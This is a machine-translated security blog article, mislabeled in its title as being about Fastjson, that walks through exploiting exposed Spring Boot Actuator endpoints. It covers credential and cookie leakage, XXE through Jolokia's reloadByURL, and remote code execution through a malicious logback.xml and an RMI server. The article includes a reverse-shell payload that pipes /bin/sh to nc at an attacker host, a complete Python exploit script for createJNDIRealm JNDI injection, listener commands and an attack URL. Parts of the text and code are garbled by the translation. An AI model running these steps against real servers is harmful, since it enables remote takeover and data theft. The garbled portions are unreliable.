Shulou(Shulou.com)05/31 Report--

How to achieve Fastjson deserialization vulnerability exploitation, in view of this problem, this article introduces the corresponding analysis and solutions in detail, hoping to help more partners who want to solve this problem to find a more simple and feasible method.

Preface

Actuator is the service monitoring and management middleware provided by Spring Boot. When the Spring Boot application runs, it automatically registers multiple endpoints with the routing process. Due to the misconfiguration of these endpoints, it may lead to some security problems such as system information disclosure, XXE, and even RCE.

Loophole discovery

There are usually two locations to determine whether a site uses the Spring Boot framework.

1. The picture file of the website is a green leaf.

2. Unique error message.

Affect the version

Spring Boot

= 1.5 only access to / health and / info endpoints is allowed by default, but this security is usually disabled by application developers

Endpoint description

The official documentation describes the functionality of each endpoint.

Path description / autoconfig provides an autoconfiguration report that records which autoconfiguration conditions pass and which fail to describe all Bean in the application context through / beans And their relationship / env gets all environment properties / configprops describes how configuration properties (including default values) are injected into Bean/dump to take snapshots of thread activity / health reports the health indicators of the application, these values are provided by the HealthIndicator implementation class / info to obtain customized information for the application This information is provided by the attributes headed by info / mappings describing all URI paths and their mapping with the controller (including Actuator endpoints) / metrics reports various application metrics information, such as memory usage and HTTP request count / shutdown shuts down the application, requiring endpoints.shutdown.enabled settings to provide basic HTTP request tracking information (timestamps, HTTP headers, etc.) for true/trace

Spring Boot version 1.x endpoints are registered under the root URL.

The Spring Boot version 2.x endpoint is moved to the / actuator/ path.

The location of the endpoint in this article is based on the root directory of the website. The situation encountered in the actual combat is that the endpoint may be stored in a multi-level directory and need to find it on its own.

Visit the / trace endpoint to get the recent request information received by the server.

If there is an operation request from the login user, you can fake cookie to log in.

Access the / env endpoint to get the environment properties.

Database account leakage

Jolokia endpoint utilization

Most Actuator only support GET requests and display only sensitive configuration data, which can cause XXE or even RCE security problems if improper Jolokia endpoints are used.

ReloadByURL method

Check the Mbeans that exists in / jolokia/list and see if there is a reloadByURL method provided by the logback library.

Implementation of xxe vulnerability

The reloadByURL method, which allows remote loading of logback.xml configuration files, and parsing xml files without any filtering measures, resulting in a xxe vulnerability.

1. Create logback.xml and fileread.dtd files

Logback.xml, the address is the public network vpsweb service address.

& amptrick

Fileread.dtd

2. Upload the created logback.xml and fileread.dtd files to the web directory of the public network vps.

3. Access logback.xml files remotely.

Www.xxx.com jolokiaamp execpact.qos.logback.classicVaridefaultMagic TypeSecretch.qos.logback.classic.jmx.JMXConfiguratorCompact reloadByURLhand httpplplash

Successfully use xxe to read the contents of the etc/passwd file.

Remote code execution implementation

You can use the insertFromJNDI tag in logback.xml, which allows us to load variables from JNDI, resulting in a rce vulnerability.

The process of rce is mainly divided into four steps. Detailed process

1. Construct the Get request access target to load the malicious logback.xml file to the external server.

2. When parsing logback.xml, the InitialContext.lookup (URI) operation will eventually be triggered, and URI is a malicious RMI service address.

3. The malicious RMI server returns a Reference object to the target. The Reference object specifies the local BeanFactory class of the target, as well as the class name, attribute and attribute value of Bean Class (in this case, ELProcessor, x, eval (...)).

4. When the target carries out the lookup () operation, it will dynamically load and instantiate the BeanFactory class, then call the factory.getObjectInstance () method to instantiate any Bean Class pointed to by Reference by reflection, and will call the setter method to assign values to all attributes. Corresponding to our code, when the setter method is finally called, the following code is executed:

ELProcessor.eval (\ "\" .getClass (). ForName (\ "javax.script.ScriptEngineManager\"). NewInstance (). GetEngineByName (\ "JavaScript\"). Eval (\ "new java.lang.ProcessBuilder ['(java.lang.String [])]] (['/ bin/sh','-c','rm / tmp/f;mkfifo / tmp/f;cat / tmp/f | / bin/sh-I 2 > & 1 | nc evil-server-ip port > / tmp/f']) .start ()\"

ELProcessor.eval () evaluates the EL expression (in this case, bounce shell) to the effect of RCE.

1. Download the rce utilization code.

Modify the code for Spring-Boot-Actuator-Exploit\ maliciousRMIServer\ src\ main\ java\ hello\ EvilRMIServer.java.

You can modify the port on which RMI listens remotely, and the address and port of the bounce shell.

Use maven to compile and package the java code.

Enter the Spring-Boot-Actuator-Exploit-master/maliciousRMIServer directory and execute

Mvn clean install

After the package is successful, create the RMIServer-0.1.0.jar file in the target directory.

Modify the contents of the logback.xml file.

Upload the RMIServer-0.1.0.jar file to the public network vps.

Execute the RMIServer-0.1.0.jar file. When you turn on RMI snooping on the attack plane, you need to specify the public network address of your own RMI listener through 'Djava.rmi.server.hostname=x.x.x.x'.

Java-Djava.rmi.server.hostname=x.x.x.x-jar RMIServer-0.1.0.jar

Vps uses nc to listen on the port specified by the bounce shell.

Nc-lvp 9998

Access the vulnerability url:

Http://x.x.x.x/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!114.x.x.x!/logback.xml

Rebound shell successfully.

CreateJNDIRealm method

For related principles, please see

Attack Spring Boot Actuator via jolokia Part 2

Check to see if there is a createJNDIRealm method provided by the org.apache.catalina.mbeans.MBeanFactory class in / jolokia/list, and there may be JNDI injection, resulting in remote code execution.

The process of utilization is divided into five steps.

1. Create a JNDIRealm

2. Write contextFactory to RegistryContextFactory

3. Write connectionURL as your RMI Service URL

4. Stop Realm

5. Start Realm to trigger JNDI injection

You can replay it step by step using burp, or you can execute it directly using a python script.

Import requests as reqimport sysfrom pprint import pprinturl = sys.argv [1] + "/ jolokia/" pprint (url) # create JNDIRealmcreate_JNDIrealm = {"mbean": "Tomcat:type=MBeanFactory", "type": "EXEC", "operation": "createJNDIRealm", "arguments": ["Tomcat:type=Engine"]} # write contextFactoryset_contextFactory = {"mbean": "Tomcat:realmPath=/realm0,type=Realm", "type": "WRITE", "attribute": "contextFactory" "value": "com.sun.jndi.rmi.registry.RegistryContextFactory"} # write connectionURL as the public network RMI service address set_connectionURL = {"mbean": "Tomcat:realmPath=/realm0,type=Realm", "type": "WRITE", "attribute": "connectionURL", "value": "rmi://x.x.x.x:1097/jndi"} # stop Realmstop_JNDIrealm = {"mbean": "Tomcat:realmPath=/realm0,type=Realm", "type": "EXEC" "operation": "stop", "arguments": []} # run Realm Trigger JNDI injection start = {"mbean": "Tomcat:realmPath=/realm0,type=Realm", "type": "EXEC", "operation": "start", "arguments": []} expoloit = [create_JNDIrealm, set_contextFactory, set_connectionURL, stop_JNDIrealm, start] for i in expoloit:rep = req.post (url, json=i) pprint (rep.json ())

Use the previously packaged jar package, RMIServer-0.1.0.jar, to run the RMI service

Java-Djava.rmi.server.hostname=x.x.x.x-jar RMIServer-0.1.0.jar

Use nc to listen on bouncing ports

Nc-lvp 9998

Send a request using python

Python exp.py http://x.x.x.x:8087

Rebound shell successfully.

Spring Cloud env

When spring boot uses Spring Cloud-related components, the spring.cloud.bootstrap.location attribute exists, and RCE is implemented by modifying the spring.cloud.bootstrap.location environment variable

Refer to https://www.anquanke.com/post/id/195929 for vulnerability principle.

Utilization range

Spring Boot 2.x cannot be successfully exploited

Spring Boot 1.5.x can be used successfully when using Dalston version, but not with Edgware.

Spring Boot

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.